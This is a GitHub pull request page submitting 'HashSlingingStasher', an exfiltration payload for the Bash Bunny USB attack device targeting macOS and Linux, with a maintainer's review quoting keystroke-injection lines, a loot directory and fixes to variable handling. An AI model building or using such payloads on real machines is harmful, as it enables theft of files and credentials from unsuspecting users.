Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

HashSlingingStasher (HSS) Submission #667

Open
wants to merge 7 commits into
base: master
Choose a base branch
from
Open

HashSlingingStasher (HSS) Submission #667

wants to merge 7 commits into from

Conversation

theSW4n
Copy link

@theSW4n theSW4n commented Sep 29, 2023
edited
Loading

Version 1.0 submission of the HashSlingingStasher. This is an exfiltration payload for MacOS, Ubuntu, Manjaro and Kali Linux.

hak5peaks
hak5peaks requested changes Sep 1, 2024
View reviewed changes
payloads/library/exfiltration/HashSlingingStasher/payload.txt
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "udisksctl mount -b /dev/disk/by-label/`ls /dev/disk/by-label/ | grep -i BashBunny`"
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I would recommend using a variable assignment for the drive label as not everyone's configuration will have the default BashBunny drive label. This makes user configuration much easier.

You can do this by adding it to the top of your payload. For example with line:

DRIVE_LABEL="BashBunny"
QUACK STRING "udisksctl mount -b /dev/disk/by-label/`ls /dev/disk/by-label/ | grep -i $DRIVE_LABEL`"

this will result in the bash bunny injecting

udisksctl mount -b /dev/disk/by-label/BashBunny

If you want the Bash Bunny to also inject | grep -i BashBunny you need to add escapes. Otherwise the bunny bunny will interpret it as bash. For example:

QUACK STRING "udisksctl mount -b /dev/disk/by-label/\`ls /dev/disk/by-label/ | grep -i $DRIVE_LABEL\`"

this line will result in the bash bunny injecting

udisksctl mount -b /dev/disk/by-label/`ls /dev/disk/by-label/ | grep -i BashBunny`

Assuming you modify it to use the variable DRIVE_LABEL for the drive label. Please go through and ensure everything is properly escaped and the variable for DRIVE_LABEL is added.

payloads/library/exfiltration/HashSlingingStasher/payload.txt
# Attackmodes: HID, Storage

# Options
hss_target_directory=/
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If you want to use this variables inside of your other script, you use use export exporting the variable allows other scripts to call this variable. for example:

hss_target_directory=/
export hss_target_directory

and then you can call it in anther script like normal

$hss_target_directory

payloads/library/exfiltration/HashSlingingStasher/hss_bbscript.sh
# Variables (defined by user in payload.txt)
mountpt=$(mount | grep -i BashBunny | cut -d ' ' -f 3)
lootdir=$mountpt/loot/hss
target_directory=$(grep -hi hss_target_directory $mountpt/HSS/payload.txt | cut -c 22-)
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Referencing my comment you use use export exporting the variable inside payload.txt allows other scripts to call this variable. for example you can modify payload.txt with:

hss_target_directory=/
export hss_target_directory

and then you can call it in this script like like any other variable.

$hss_target_directory

Please update your variables to use export

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@hak5peaks hak5peaks hak5peaks requested changes

Assignees
No one assigned
Labels
changes requested
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@theSW4n @hak5peaks